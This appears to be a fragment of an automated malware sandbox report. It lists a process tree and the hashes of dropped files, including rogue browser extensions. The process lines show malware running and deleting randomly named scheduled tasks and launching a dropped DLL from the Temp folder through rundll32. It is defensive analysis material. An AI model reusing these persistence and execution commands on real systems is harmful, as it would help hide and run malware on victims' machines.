C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BinjFlxHFUMMGNOij"2⤵PID:2860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"2⤵PID:3568
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll",#1 /eesite_idjzI 3851181⤵PID:2892
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll",#1 /eesite_idjzI 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"3⤵PID:2988
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e2efd03f03c31e53a7a822f50dc92f43
SHA1d467728cde80c4004894746837958523ada0fd42
SHA256e14481071695fd3209193f80960a38f951cb555dc3b7c3f958862de0426d9ee9
SHA512acc0ddcf763557c817037912183f2a36e2fc1ad82d98cbcaed2be0e1e3bc4e58899c59785d33dca36ff24250af44c258ed6c20f9e3ef117b92fbaa59dc29ed50
-
Filesize
2KB
MD58f9aff00135e04088031da82de0a386d
SHA15f05cc1ed111ba27cca1f7c335a551c886bb88c6
SHA256fcf74949f31390b2766076e5140cbcdc6f9169f7dd47bc0d0bd4def5dd8d5acc
SHA512d87c8bbfa3eee99e25242bd3df503685865e56eeafa9c78609cf6ac390120aeb8b785781e13d16c9a1abbd4305bea7c82b8c280de72e345c2941e5ca2a8f797d
-
Filesize
2KB
MD54bc21c459267502c6c33ca9fb9d4fc6f
SHA1e6a126ea288b4482386108a644da9d7a19af444d
SHA256a65017400cac13d1e1224e32fcb7b0c127556952ee59e30521a1bd1a6c740948
SHA5127dac3898959abc5c62b0c9156074312060051a4dd5b30ec2b857b579cfbbc04ed7fa1f1dc8e959bb1b255f2d52f917ecf1fc5f8b5283e8d3807891629d43d730
-
Filesize
2KB
MD5e39c8d0dd1079cca53d6c57fe6bdc6ff
SHA16f4a06efec1438b497375a8133608b13aa548c08
SHA2564989fc14ec0613b2733ac0a282a14ff90d718d2294fa97a404fd4a7b1ecc66a2
SHA5127fc3eebc6809449c0be6f9504e55a1089dc74042da698506585d377d1751f3fec7d5f8644f5fee0e4ccd3b8e83a230f62561f8cf4551b43602c449e34947ceb2
-
Filesize
2.0MB
MD52c0871329d9fc6fbfd631fd60b9181fb
SHA17f452ab3b7dddbec15083aad00e4cda16d088f01
SHA256b79d3124ceb171fd94bc4d673230b86899889f3d775aff998f5e514379a50122
SHA51225037191c57d1309d9b761c4159f12a216d715d439a74ab8c8f363be1c55d8ec78f83c6e53bea2d07d041847001a77087c7904d0983b9351d406a98d569ffd26
-
Filesize
2KB
MD56d31d41e95b2986f8912f2f2de352c4a
SHA13754820c61fe36f9bea0475030c7c3eca06ac5a9
SHA256e7fd271fe3718e9a657a9afc2826ab1c5e9b2543cf70bd73df192f47558f57c7
SHA512b41629876b22d8ed837f0fa6c16c79022d0deef7e009192810dbaf3a29a6bfeed258605a87ceda752c766fb1d2f2ec8540e164de43a76ccce3e6804caea4da04
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD56b92d7b0714ab723c5a2349817db1c8e
SHA129b9a1f81f37997a4cb1bb6b11051baea6cd61f1
SHA25642bea5206bdb913936a43ee19796f4a9c5529c4f752390621b12045ce5c3e47e
SHA5125a9f61b1a14e99d1eb685e56a7c44c2caa6f446c9986d34557d989bc267892568dc3cec684ac9d7d2a4a842658100e5bc79c6d4d36516f78dd848569b3a5eb79
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD51e68ec0e702e6fcb1ccbd99161309da8
SHA17d3a9e224a190905ab049b486c550e322e9c4e45
SHA2565eef7c37132b0d97bd34ed02472f4a511fc51d596e59dac13660558969f1a84f
SHA512d4a8f4048234fe732b73921d5d29bd60757a90c269942de06d78b27b0f0e0e7f725c754427bb289a3a084cc01a1878d673e028f8d1f40d8739e1065c54b44467
-
Filesize
11KB
MD54cacababa12ce908231a4e9d5a9cd3e4
SHA1e536762af5abf4face0ee3083f23c9431c4418c4
SHA2566a9a8dcae0e37ab806bb5ef429feec1795210badb0217adf62055b534c252be0
SHA512fbc709421f35210881591ab56cda3038055df80aa7703a9a7e6b26e246c01306aefcb9d6b0056710c5f895cb8ed041060d40e267203250ec80d8e1ba0fc90078
-
Filesize
6.7MB
MD5179fb197a3d7311375c9037091fc224c
SHA1802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5d30083b46c8d9ef8b9b2a5954d7cd817
SHA13ee0b8c0a63cf23ef95032abd3f9196ebe92b959
SHA2567fd0d0189bb8f2a0e69f20a4779f9aa62e5be34ee8d7f7d36ed57cb20fe7b39e
SHA512bdf1c706cabe924c536851d46d25e3f80b4375dc2d4cb0512e06479a1687af441a8927d1ead39d1ea366450e0fc90afe32f91df9bac6856f7caf79e193f2dde5
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD58b0aba6279662af61c28878cd8870e0b
SHA19b3054be4ac73bc1e3092ccc5b9250dddaa16fe5
SHA256a86f7a800f3fe0a0af7c3b23bf7c29baf810e833950b630b42902d25dfac89df
SHA512e86f5dae451727c4fc8d1ab75e0ec893bc32f6305afc96af75a1ed5783cd9c3f0156479db6cc0e96cbac60fd10da40793d766c50183ee05113d50e8c9318f12c
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD51c455e22616fb740376e8b8d5ec32818
SHA1ccc3176f03dd9fe4d90b78068f340d6f871bea78
SHA25609b3a41aec2fefabe843848e9cf23ac127a5102e4c261ea1c7490006888faf86
SHA512007cfb87803b7b79e0d6bd05508b48fcf98e5ba2e57e40c33068069ce60402c05b80c58e3b85d2af2df333caa50f060965c7d551e39348ca426059ee4967079b
-
Filesize
6.4MB
MD544f3948cb32c3b8df1fca5ef30116aa0
SHA1c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA25612cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA51209d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0
-
Filesize
5KB
MD5076dee9a0e7f704f50435a860ef61ffc
SHA171bfb3f8905b3c81698ce82e5fe37097dd9b9d7c
SHA256153089f4c44b875138ca8d7bbfe3fc6817173c18afa9c44391aad496957c29de
SHA512f494671a802d512087f3c814f581e986f884d83605f642fbf9493d3ca39ce3005436bd25990085dd4e2e2b3a506765f3ef453f8e4a50b686c4cea14b9208ccc6